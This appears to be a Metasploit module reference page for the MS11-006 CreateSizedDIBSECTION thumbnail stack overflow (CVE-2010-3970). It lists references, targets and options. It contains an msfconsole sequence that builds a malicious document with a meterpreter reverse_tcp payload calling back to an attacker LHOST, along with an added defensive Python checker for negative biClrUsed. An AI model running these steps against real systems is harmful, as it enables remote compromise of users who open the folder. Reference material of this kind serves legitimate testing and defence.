Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
This module exploits a stack-based buffer overflow in the handling of thumbnails within .MIC files and various Office documents. When processing a thumbnail bitmap containing a negative 'biClrUsed' value, a stack-based buffer overflow occurs. This leads to arbitrary code execution. In order to trigger the vulnerable code, the folder containing the document must be viewed using the "Thumbnails" view.
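As an added, defender-side example that is not part of this page or the Metasploit module, the Python below parses a thumbnail's BITMAPINFOHEADER and flags a biClrUsed value that is negative when read as a signed 32-bit integer, alongside a simplified model of the signed bound such a value would slip past. The signed-bound model, the 256-entry palette limit and the two sample headers are assumptions constructed for illustration, not taken from the Windows code.

```python
import struct

# BITMAPINFOHEADER, 40 bytes, little-endian: biSize, biWidth, biHeight, biPlanes,
# biBitCount, biCompression, biSizeImage, biXPelsPerMeter, biYPelsPerMeter,
# biClrUsed, biClrImportant.  biClrUsed is the palette entry count.
BITMAPINFOHEADER = struct.Struct("<IiiHHIIiiII")
FIELD_NAMES = ("biSize", "biWidth", "biHeight", "biPlanes", "biBitCount",
               "biCompression", "biSizeImage", "biXPelsPerMeter",
               "biYPelsPerMeter", "biClrUsed", "biClrImportant")
MAX_PALETTE_ENTRIES = 256  # an 8-bpp DIB palette holds at most 256 RGBQUADs (assumed bound)

def parse_bitmapinfoheader(data: bytes) -> dict:
    """Unpack the header that precedes a DIB's palette and pixel data."""
    if len(data) < BITMAPINFOHEADER.size:
        raise ValueError("truncated BITMAPINFOHEADER")
    return dict(zip(FIELD_NAMES, BITMAPINFOHEADER.unpack_from(data)))

def as_signed32(value: int) -> int:
    """Reinterpret the unsigned field as the value a signed 32-bit compare would see."""
    return value - (1 << 32) if value & 0x80000000 else value

def weak_palette_check(hdr: dict) -> bool:
    """Simplified model (assumption) of a signed upper bound: negatives pass it."""
    return as_signed32(hdr["biClrUsed"]) <= MAX_PALETTE_ENTRIES

def audit_palette_count(hdr: dict) -> str:
    """Hardened check: reject the sign bit, then bound by 256 and by biBitCount."""
    n = hdr["biClrUsed"]
    if n & 0x80000000:
        return "negative biClrUsed (sign bit set)"
    if n > MAX_PALETTE_ENTRIES:
        return "biClrUsed exceeds 256 palette entries"
    if hdr["biBitCount"] in (1, 4, 8) and n > (1 << hdr["biBitCount"]):
        return "biClrUsed exceeds 2**biBitCount"
    return "ok"

def scan_dib(data: bytes) -> str:
    """Parse a raw DIB header and return the audit verdict for its palette count."""
    return audit_palette_count(parse_bitmapinfoheader(data))

def build_header(clr_used: int) -> bytes:
    """Constructed sample: a 64x64 8-bpp uncompressed header with the given biClrUsed."""
    return BITMAPINFOHEADER.pack(40, 64, 64, 1, 8, 0, 64 * 64, 2835, 2835,
                                 clr_used, 0)

BENIGN_HEADER = build_header(256)          # constructed, well-formed palette count
SUSPECT_HEADER = build_header(0xFFFFFFFF)  # constructed, reads as -1 when signed
```

Run scan_dib over the 40 bytes at the start of each embedded thumbnail's DIB; anything other than "ok" is worth quarantining before a thumbnail view renders it.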
Exploit Rank
- Great
Exploit Authors
- Moti & Xu Hao
- Yaniv Miron aka Lament of ilhack
- jduck < jduck [at] metasploit.com >
Vulnerability References
- CVE-2010-3970
- OSVDB-70263
- MSB-MS11-006
- BID-45662
- http://www.microsoft.com/technet/security/advisory/2490606.mspx
- http://www.powerofcommunity.net/schedule.html
Exploit Targets
- 0 - Automatic (default)
- 1 - Windows 2000 SP0/SP4 English
- 2 - Windows XP SP3 English
- 3 - Crash Target for Debugging
Similar Exploit Modules
- exploit/windows/fileformat/a-pdf_wav_to_mp3
- exploit/windows/fileformat/acdsee_fotoslate_string
- exploit/windows/fileformat/acdsee_xpm
- exploit/windows/fileformat/activepdf_webgrabber
- exploit/windows/fileformat/adobe_collectemailinfo
- exploit/windows/fileformat/adobe_cooltype_sing
- exploit/windows/fileformat/adobe_flashplayer_button
- exploit/windows/fileformat/adobe_flashplayer_newfunction
- exploit/windows/fileformat/adobe_flatedecode_predictor02
- exploit/windows/fileformat/adobe_geticon
Exploit Usage Information
$ msfconsole
msf > use exploit/windows/fileformat/ms11_006_createsizeddibsection
msf exploit(ms11_006_createsizeddibsection) > show payloads
msf exploit(ms11_006_createsizeddibsection) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms11_006_createsizeddibsection) > set LHOST [MY IP ADDRESS]
msf exploit(ms11_006_createsizeddibsection) > exploit
Exploit Module Options
| Option | Description |
| --- | --- |
| FILENAME | The file name. (default: msf.doc) |
| OUTPUTPATH | The output path to use. (default: /home/svn/.msf4/data/exploits/) |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| DynamicSehRecord | Generate a dynamic SEH record (more stealthy) |
| EnableContextEncoding | Use transient context when encoding payloads |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |
